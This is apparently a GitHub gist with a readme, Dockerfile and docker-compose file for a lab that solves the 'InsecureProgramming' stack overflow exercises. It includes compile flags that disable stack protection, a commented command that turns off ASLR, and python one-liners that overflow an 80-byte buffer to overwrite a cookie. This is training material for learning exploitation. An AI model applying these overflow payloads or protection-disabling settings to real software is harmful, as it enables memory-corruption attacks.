Skip to content

Instantly share code, notes, and snippets.

@mberrueta

mberrueta/Dokerfile

Last active October 20, 2018 18:50
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save mberrueta/82a1abf2e075c54b35f602d1d28fbd54 to your computer and use it in GitHub Desktop.
Save mberrueta/82a1abf2e075c54b35f602d1d28fbd54 to your computer and use it in GitHub Desktop.
Download ZIP
InsecureProgramming
Raw
readme.md

docker exec -it pc1_seg bash

run

docker-compose up -d
docker exec -it pc1_seg bash

Ex 1

gcc -m32 -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack1 stack1.c
# view code
# $ cat stack1.c

# hex to string
# $ python -c '"41424344".decode("hex")' #> ABCD

# resolve
# python -c 'print("." * 80 + "ABCD")' #> ................................................................................DCBA

# $ ./stack1
# buf: ffb5fdf0 cookie: ffb5fe40
# ................................................................................DCBA
# you win!

Ex 2

# gcc -m32 -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack2 stack2.c
# view code debugging
# $ gdb stack2
# $ (gdb) list

# resolve
# $ python -c 'print("." * 80 + "05030201".decode("hex"))' | ./stack2
# you win!

Ex 3

# same than2???
# gcc -m32 -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack3 stack3.c
# view code
# cat stack3.c

# resolve
# $ python -c 'print("." * 80 + "05000201".decode("hex"))' | ./stack3
# you win!

Ex 4

# gcc -m32 -fno-stack-protector -ggdb -mpreferred-stack-boundary=2 -z execstack -o stack4 stack4.c
# view code debugging
# $ gdb stack4
# $ (gdb) list
# ??? ¯\_(ツ)_/¯
Raw
docker-compose.yml
version: '3'
services:
pc1_seg:
container_name: pc1_seg
build: .
stdin_open: true
tty: true
Raw
Dokerfile
FROM debian:stable
RUN apt update
RUN apt install -y git gcc gcc-multilib g++-multilib python vim gdb
# RUN sysctl -w kernel.randomize_va_space=0 # disable secuty flags
RUN git clone https://github.com/gerasdf/insecureProgramming/
WORKDIR /insecureProgramming/exercises/
# copy Host to container ADD /my_app_folder /my_app_folder
# run command on execution CMD "echo" "Hello docker!"
# environment variables ENV SERVER_WORKS 4
# expose ports EXPOSE 8080
# run on build RUN aptitude install -y riak
# link host folder to container VOLUME ["/my_files"]
# WORKDIR ~/.
# After modify run with `$ docker-compose up --build` to rebuild
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment